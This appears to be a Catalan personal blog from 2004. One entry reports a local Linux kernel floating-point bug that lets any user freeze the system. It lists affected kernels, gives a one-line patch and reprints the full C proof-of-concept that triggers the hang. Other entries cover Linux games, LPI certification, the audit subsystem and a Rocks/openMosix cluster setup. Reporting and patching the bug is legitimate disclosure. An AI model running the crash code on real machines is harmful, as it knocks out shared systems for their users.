lo tomàs avança

Llegint a barrapunto he trobat això: “Cómo traducir documentos técnicos“, on parla d’un article que han tret a libertonia per ajudar a la realizació de traduccions.

Un altre link que hi ha per allí és el de “Cómo-Traducción“.

A banda de la part útil de la noticia, cada dia es veu més que les opinions (no totes, però si la majoria) són tontades. Gent que a la mínima es tira a la “yugular” dels altres. Fatal.

A diversos llocs (barrapunto, quands.info…) es fa ressó d’una nova fallada de seguretat a la majoria de nuclis actuals, 2.4.x i 2.6.x. Alguns punts a concretar són, per exemple, que l’exploit és local i no es pot aprofitar per aconseguir permisos de super usuari ni per comprometre les dades del sistema. O sigui, que te pega una penjada a sistema i ja està

Com a curiositat geeeeeeens partidista, a la web de l’Associació d’Usuaris GNIX diuen:
“15-06-2004
Se encontró un fallo de seguridad en todos los kernels, excepto algunos de Gentoo, y otros. Un usuario puede ejecutar un programa malicioso y causar que el sistema se pare.”
Anda lo que ha dichooooo xDD

També proposa una senzilla solució:
“Si ya has compilado un kernel solo tienes que cambiar una liña, En el fichero /usr/src/linux/include/asm-i386/i387.h Línea 51. Cambiar : asm volatile(”fwait”); Por: asm volatile(”fnclex ; fwait”);”

La noticia original del bug la podem trobar a aquí, dintre la web de linuxreviews, on hi ha una llista dels kernels afectats, els no afectats i parches per a totes les versions afectades.

Una llisteta:

Afectats

# Linux 2.6.x
o 2.6.7-rc2
o 2.6.6 (vanilla)
o 2.6.6-rc1 SMP (verified by blaise)
o 2.6.6 SMP (verified by riven)
o 2.6.6-debian (verified by arturaz)
o 2.6.5-gentoo (verified by RatiX)
o 2.6.5-mm6 – (verified by Mariux)
o 2.6.5 (fedora core 2 vanilla)
o 2.6.3-13mdk (Mandrake)

# Linux 2.4.2x
o 2.4.26 vanilla
o 2.4.26, grsecurity 2.0 config
o 2.4.26-rc1 vanilla
o 2.4.26-gentoo-r1
o 2.4.22
o 2.4.22-1.2188 Fedora FC1 Kernel
o 2.4.20 RH7.3 (gcc 2.96)
o 2.4.18-bf2.4 (debian woody vanilla)

No afectats
# Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
# Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
# Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
# Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
# Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
# 2.2.19-kernel

Bé, aquí està tot. Fins i tot el codi maliciós!! Pos és realment senzill:

#include <’sys/time.h’>
#include <’signal.h’>
#include <’unistd.h’>
static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ (”fsave %0 ” : : “m”(fpubuf));
write(2, “*”, 1);
__asm__ __volatile__ (”frstor %0 ” : : “m”(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, “.”, 1);
return 0;
}

En una de les moltes lectures diàries a barrapunto he trobat una noticia que a priori semblava curiosa, però no allò que t’interesa de mala manera (com aquesta: El CERN, Extremadura y la tecnología GRID) però que te un cuquet… Pasando revista al panorama de juegos linuxeros.

L’article que cita aquesta noticia repasa alguns dels jocs disponibles per GNU/Linux als quals ha jugat l’autor. Un que sembla molt bo, distret i viciant és l’anomenat “enigma”, i l’anomena com “el millor joc d’intel ligència”. S’haurà de provar… jejeje… que jo mai m’enganxo ni me vicio ni m’obsessiono en res. Bé, el joc en qüestió està disponible aquí.

I llegint una miqueta d’aquí, una miqueta d’allà arribo al final, “juegos que me he dejado en el tintero”,. Pego un cop d’ull i veig que hi ha la secció “juegos propietarios” i penso “bah, segurament aquí d’interessants només hi haurà el Quake3 i el RTCW”. Segueixo, i després pampallugues als ulls, psicotropisme i comportaments anormals. HI HA EL NEWERWINTER NIGHTS PER GNU/LINUX!!!! ^_^’

Dios existe. Ara (i ara vol dir fa un any i mig) no em vicio molt pels examens, la carrera i tot això. Però encara recordo exactament on em vaig quedar, i exactament amb quins personatges (i amb quins objectes, per supost). I tinc unes ganes de tornar a jugar… Arghhhhhhhh!!!!!!

Anda que no xalaré quan li digui al Damià xDD

Gràcies a Gerard Porto i a través del seu correu a la llista de la GPL Tarragona vaig conèixer la iniciativa començada per la pàgina FreeUOC per “gestionar” un curs d’ajuda per aconseguir la certificació LPI. Aquesta certificicació bàsicament diu que tens un cert domini sobre l’entorn GNU/Linux i certifica que sabries treballar amb ell.

Crec que uns dels punts a favor d’aquesta certificació són els seus esponsors. I potser us semblarà una tonteria, però ara mateix per la zona que estem vivint (Tarragona) la certificació CCNA de Cisco encara és molt poc reconeguda, ja que l’empresa no els sona als empresaris (?¿? bé, o això ens han dit). Entre els esponsors podem trobar IBM, sgi, SuSE, turbolinux (distribució de clústers!), Novell, HP… la llista completa la podem trobar a aquí. I bé, estic segur que algun d’aquestos noms ha de sonar a tothom, per tant pot ser un punt favorable.

Doncs bé, armat amb totes les meves raons em vaig decidir a explicar-li a Cristina (la meva novia, que fa químiques) perquè li convindria aconseguir aquesta certificació. Les raons bàsiques que li vaig donar van ser:
   - Als laboratoris fan servir GNU/Linux. Sense anar més lluny, els que han de fer servir el clúster són Enginyers Químics i treballen exclusivament amb GNU/Linux. De forma que de cara a entrar a un laboratori en concret aquestos coneixements (i ja no només la certificació) li poden beneficiar molt.
   - Que entendria més paraules per minut de les que ara entèn quan parlo d’informàtica.
   - Que el podríem fer juntets i jo l’ajudaria

Bé, aquesta última la va desmuntar (encara que la primera va tenir molt de pes xDD). De forma que no em va poder dir que no, o sigui que tècnicament em va dir que si (o això pensaria Boole davant d’un tribunal). Com el projecte sembla que encara li queda molt per madurar hi ha molt de temps pel mig per pensar-s’ho, però l’important, el primer pas d’obrir la ment ja ha estat donat.

Per si algú té més dubtes aquí pot trobar el FAQ del projecte.

Algú havia sentit parlar mai d’una cosa anomenada “audit subsystem”??? Es veu que és un pedaç per al nucli, però encara no he acabat d’aclarir que fa. A més, pel google no té cap pàgina oficial. Màxim que he trobat:

   - http://people.redhat.com/faith/audit/
   - A la carpeta drivers del nucli hi ha una carpeta “audit” amb el codi font del pedaç.

De moment recompilaré el kernel introduint aquest pedaç, a veure que passa. Utilitzaré la 2.4.24 del CVS.

Me sembla que acabo d’observar un parell de coses curioses…:
- La primera vegada que instal lo un nucli només em crea una entrada al grub, en canvi, les successives reinstal lacions me’n crea 2.
- La primera arrencada m’instal la els paquets pvfs que feien falta.

Bé, després de molta investigació per fi he trobat que dimonis era això del audit. Audit només una de les eines d’un paquet, el Linux Audit Subsystem (LAuS). Info i paquets aquí i aquí. A la distribució Rocks es pot localitzar al lloc on es posen tooooooootes les coses:
   /home/install/rocks-dist/enterprise/3/en/os/i386/RedHat/RPMS/laus-0.1-56RHEL3.i386.rpm
   /home/install/rocks-dist/enterprise/3/en/os/i386/RedHat/RPMS/laus-libs-0.1-56RHEL3.i386.rpm

El problema que hi ha és amb el nucli, com sempre. “Your kernel has to support system call auditing to make these tools work” ve a dir que si fas servir un vanilla, patapam!! Pos que això no funciona. Aquí sorgeix una decisió:

      a) Buscar com intentar dotar d’aquest suport al kernel.
      b) Passar d’això, ja que no és gens necessàri, és només per paranoics de la seguretat.

Segons aquesta web l’audit system el que fa és “monitoritzar” tot el que els usuaris fan, però també indica que el “Kernel System Call Auditing” afecta el rendiment i usa un tall d’espai al disc.

Donat que l’ús del Ganglia és més important, millor abans em dedico al Ganglia.

Remirant per la web d’openMosix-Contributors he trobat un pedaç per fer que l’MPICH llençi els processos a través d’openMosix enlloc de llençar-los a través d’rsh.

 Avui he trobat perquè no funcionava la rutina d’mpirun. Llegint la secció corresponent del manual de Rocks 3.2.0 diu:

Mpirun on Rocks clusters is used to launch jobs that are linked with the Ethernet device for MPICH.

You must run HPL as a regular user (that is, not root). If you don’t have a user account on the cluster, create one for yourself with:

# useradd username

For example, to interactively launch the benchmark “High-Performance Linpack” (HPL) on two processors:
* Create a file in your home directory named machines, and put two entries in it, such as:
            compute-0-0
            compute-0-1
* Download the the two-processor HPL configuration file and save it as HPL.dat in your home directory.
* Now launch the job from the frontend:
            $ /opt/mpich/gnu/bin/mpirun -nolocal -np 2 -machinefile machines /opt/hpl/gnu/bin/xhpl

Bé, els problemes que tenia eren:

a) Quan es crea l’usuari i després entres al seu compte no se li ha d’especificar contrasenya per a la clau ssh, ja que sinó quan envies a executar els processos es queden atrapats en l’autorització.

b) He de probar si els programes es poden enviar a executar no des de dins el frontend, sinó des d’algun node que disposi d’openMosix, ja que sinó no podré comprovar el rendiment d’MPI a través d’openMosix.

c) Continuo tenint un problema, l’HPL no es propaga cap a un dels nodes. Si al fitxer machines poso el compute-0-1 primer l’aplicació no es llança, i si el poso després només propaga cap al compute-0-0. Vaia coses més rares.

Més coses interessants, ara toca accedir des de màquines exteriors al servidor web (tocant iptables, per supost):
3.1.2. Enabling Public Web Access with Control Lists

To permenantly enable selected web access to the cluster from other machines on the public network, follow the steps below. Apache’s access control directives will provide protection for the most sensitive parts of the cluster web site, however some effort will be necessary to make effective use of them.

HTTP (web access protocol) is a clear-text channel into your cluster. Although the Apache webserver is mature and well tested, security holes in the PHP engine have been found and exploited. Opening web access to the outside world by following the instructions below will make your cluster more prone to malicious attacks and breakins.

1. Edit the /etc/sysconfig/iptables file. Uncomment the line as indicated in the file.
…
-A INPUT -i eth1 -p tcp -m tcp –dport ssh -j ACCEPT
# Uncomment the line below to activate web access to the cluster.
#-A INPUT -i eth1 -p tcp -m tcp –dport www -j ACCEPT
… other firewall directives …

2. Restart the iptables service. You must execute this command as the root user.

$ service iptables restart

3. Test your changes by pointing a web browser to http://my.cluster.org/, where “my.cluster.org” is the DNS name of your frontend machine.

If you cannot connect to this address, the problem is most likely in your network connectivity between your web browser and the cluster. Check that you can ping the frontend machine from the machine running the web browser, that you can ssh into it, etc.

També he provat a executar tasques amb el PBS, seguint aquestes indicacions. Per als treballs en serie tot ha funcionat com s’esperava, però per als treballs en paral lel no se q passa q no hi ha forma de q treballin.

El deixaré tota la nit treballant, pa que disfrute xD

Finalment m’ho he repensat i no entrego el projecte per al juny. Motius:

- Inicialment em vaig proposar realitzar tot el disseny i modificació del kernel per incoporar a la distribució Rocks el pedaç d’openMosix. Quan em vaig proposar això ja sabia que ni en somnis podia comptar en tenir la solució implantada en 1 setmana. L’important és que he arribat on en vaig proposar, fins i tot tinc feta tota la documentació del projecte fins al punt que estic.

- Crec profundament que em sentiré molt millor personalment amb tot dintre el meu projecte i sabent que he fet una bona feina. Aquest haria de ser l’ulterior intenció de qualsevol projecte.

- Tenia un compromís moral, encara que entregués el projecte ara al juny em quedaria fins que no s’acabés la implantació.

- No tinc una urgencia incontenible per entregar al juny (però si que la tindré per al setembre xDDD).

Doncs això, ShinjixX 2 – openMosix+Rocks 1, però s’ha aplaçat el desenllaç del partit fins al setembre. Bé, el blog tornarà a tenir moviment!